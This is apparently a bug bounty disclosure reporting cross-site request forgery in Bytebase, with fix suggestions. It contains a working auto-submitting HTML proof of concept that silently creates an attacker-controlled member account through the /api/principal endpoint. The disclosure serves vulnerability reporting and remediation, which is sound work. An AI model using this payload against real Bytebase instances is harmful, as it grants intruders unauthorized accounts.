Cross-Site Request Forgery (CSRF) in bytebase/bytebase
Reported on
Oct 13th 2021
Description
all part of application That use POST http method to change or create data are vulnerable to CSRF attacks.( for example the PATCH methods are not vulnerable)
I will show just create a member POC for you and if you want to see other POCs of other endpoint just say me to provide them too( I thought don't need to more POC)
1.Open the PoC.html file
2.After that you open the PoC.html a request will be sent to http://YOURSERVER:5678/api/principal endpoint.
- after that you can see that attacker create a Dev member named
attackerwith emailattacker@mail.comthat already have the credentials of new user.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://YOURSERVER:5678/api/principal" method="POST" enctype="text/plain">
<input type="hidden" name="{"data":{"type":"PrincipalCreate","attributes":{"name":"attacker","email":"attacker@mail.com","password":"VGS86VrDTMAOUYP0"}}, "test":"" value=""}" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
The impact of this CSRF is high.
#Fix suggestion
set SameSite flag for all cookies to Strict Or Lax
Or the better way is that create a CSRF token for each request.
hey bytebase team, can i ask you to tell me why delete the other occurrences?
there are many CSRFs exist in bytebase and I found all of them, if you make a one fix for all that doesn't mean there is only one occurrence(according to other bug bounty programs that i see) please let me know and if you agree i report them again.